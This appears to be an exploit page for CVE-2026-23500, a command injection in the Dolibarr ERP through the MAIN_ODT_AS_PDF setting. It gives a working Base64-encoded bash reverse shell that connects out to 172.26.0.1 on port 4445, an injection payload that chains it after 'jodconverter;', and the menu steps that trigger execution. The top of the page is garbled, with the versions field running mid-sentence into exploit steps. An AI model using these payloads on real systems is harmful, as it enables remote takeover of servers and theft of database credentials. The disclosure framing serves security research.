## https://sploitus.com/exploit?id=73BBB45B-B4F1-5E44-A031-BFDA6015091D
# CVE-2026-23500: OS Command Injection (RCE) via MAIN_ODT_AS_PDF configuration in Dolibarr
## Overview
| Field | Details |
|---|---|
| **CVE ID** | [CVE-2026-23500](https://nvd.nist.gov/vuln/detail/CVE-2026-23500) |
| **Severity** | CRITICAL |
| **Advisory** | [GHSA-w5j3-8fcr-h87w](https://github.com/Dolibarr/dolibarr/security/advisories/GHSA-w5j3-8fcr-h87w) |
| **Discovered by** | [Lukasz Rybak](https://github.com/lukasz-rybak) |
## Affected Products
- **Dolibarr/dolibarr** (versions: `) being escaped by the web application or shell, encode the reverse shell command in Base64:
```bash
# Command: bash -c 'bash -i >& /dev/tcp/172.26.0.1/4445 0>&1'
echo "bash -c 'bash -i >& /dev/tcp/172.26.0.1/4445 0>&1'" | base64
# Output: YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMjYuMC4xLzQ0NDUgMD4mMScK
```
3. Navigate to **Home -> Setup -> Other Setup**.
4. Add or modify the constant `MAIN_ODT_AS_PDF` with the following injection payload:
```bash
jodconverter; echo YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMjYuMC4xLzQ0NDUgMD4mMScK | base64 -d | bash
```
*(Explanation: `jodconverter` satisfies the initial check, `;` acts as a command separator, and the pipeline decodes and executes the Base64 payload).*
5. Navigate to **Commerce -> New proposal**, create a draft, select an ODT template (e.g., `generic_proposal_odt`), and click **Generate**.
6. Check the netcat listener. A connection will be established, granting a shell on the server:
### Impact
**Remote Code Execution (RCE).**
An attacker who gains access to an administrator account (or a malicious administrator) can execute arbitrary commands on the underlying server with the privileges of the web server user (typically `www-data`). This allows for:
- Reading sensitive configuration files (database credentials).
- Modifying application code.
- Full system compromise depending on server configuration (e.g., docker escape, pivoting).
---
### Credits
Reported by Łukasz Rybak
## References
- https://github.com/Dolibarr/dolibarr/security/advisories/GHSA-w5j3-8fcr-h87w
- https://nvd.nist.gov/vuln/detail/CVE-2026-23500
## Disclaimer
This CVE was responsibly disclosed following coordinated vulnerability disclosure practices. The information provided here is for educational and defensive purposes only.